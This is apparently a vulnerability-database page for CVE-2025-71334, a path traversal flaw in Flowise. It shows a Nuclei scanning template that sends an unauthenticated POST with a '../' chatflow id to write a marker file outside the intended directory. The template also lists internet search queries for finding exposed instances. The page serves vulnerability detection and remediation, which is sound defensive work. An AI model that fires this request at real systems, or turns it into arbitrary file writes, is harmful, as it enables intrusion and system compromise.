Flowise - Path Traversal
| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
| CVE-2025-71334 | 25 Jun 202621:41 | – | attackerkb | |
| CVE-2025-71334 | 26 Jun 202602:12 | – | circl | |
| CVE-2025-71334 | 25 Jun 202621:41 | – | cve | |
| CVE-2025-71334 Flowise - Arbitrary File Access via Missing Chat Flow ID Validation | 25 Jun 202621:41 | – | cvelist | |
| EUVD-2025-210340 | 26 Jun 202600:32 | – | euvd | |
| CVE-2025-71334 | 25 Jun 202622:16 | – | nvd | |
| CVE-2025-71334 Flowise - Arbitrary File Access via Missing Chat Flow ID Validation | 25 Jun 202621:41 | – | osv | |
| GHSA-Q67Q-549Q-P849 Flowise has arbitrary file access due to missing chat flow id validation | 15 Sep 202520:11 | – | osv | |
| PT-2026-52613 | 25 Jun 202600:00 | – | ptsecurity | |
| CVE-2025-71334 Flowise - Arbitrary File Access via Missing Chat Flow ID Validation | 25 Jun 202621:41 | – | vulnrichment |
10
id: CVE-2025-71334
info:
name: Flowise - Path Traversal
author: theamanrawat
severity: critical
description: |
Flowise <= 2.2.8 contains a path traversal vulnerability caused by missing validation of chatflowId and chatId parameters in file handling, letting unauthenticated attackers read and write arbitrary files, exploit requires no authentication.
impact: |
Unauthenticated attackers can read and write arbitrary files, potentially leading to remote code execution and full system compromise.
remediation: |
Update to version 3.0.6 or later.
reference:
- https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-q67q-549q-p849
- https://nvd.nist.gov/vuln/detail/CVE-2025-71334
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2025-71334
cwe-id: CWE-73
metadata:
verified: true
max-request: 2
vendor: flowiseai
product: flowise
shodan-query: title:"Flowise"
fofa-query: title="Flowise"
censys-query: services.http.response.html_title="Flowise"
tags: cve,cve2025,flowise,lfi,path-traversal,file-write,kev,vkev,intrusive
variables:
name: "{{randstr}}"
flow: http(1) && http(2)
http:
- method: GET
path:
- "{{BaseURL}}/"
matchers:
- type: word
part: body
words:
- "Flowise"
case-insensitive: true
internal: true
- method: POST
path:
- "{{BaseURL}}/api/v1/chatflows"
headers:
Content-Type: application/json
x-request-from: internal
body: |
{"id":"../../../../../../../../tmp","name":"{{name}}","deployed":false,"isPublic":false,"flowData":"{\"nodes\":[{\"id\":\"a\",\"data\":{\"category\":\"Document Loaders\",\"inputs\":{\"key\":\"data:text/plain;base64,bnVjbGVpLWN2ZS0yMDI1LTcxMzM0,a:{{name}}.txt\"}}}],\"edges\":[],\"viewport\":{\"x\":1,\"y\":1,\"zoom\":1}}","chatbotConfig":null,"apiConfig":null,"analytic":null,"speechToText":null,"type":"CHATFLOW"}
matchers-condition: and
matchers:
- type: word
part: body
words:
- "FILE-STORAGE::"
- type: status
status:
- 200
extractors:
- type: regex
part: body
group: 1
regex:
- '\\"FILE-STORAGE::\[\\\\\\"(.*?)\\\\\\"\]\\"'
# digest: 490a0046304402201f6a163a69b1c3d1416c6610c6fcf1cbdb9f1c5564076314e21440686136589c022025b7f2fa67aaeb85c9a3dec6595a06afccbdcfe0fadf235d4ba38267ae4f4cc4:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
29 Jul 2026 10:20Current
5.9Medium risk
Vulners AI Score5.9
CVSS 49.3
CVSS 3.19.8
EPSS0.01171
SSVC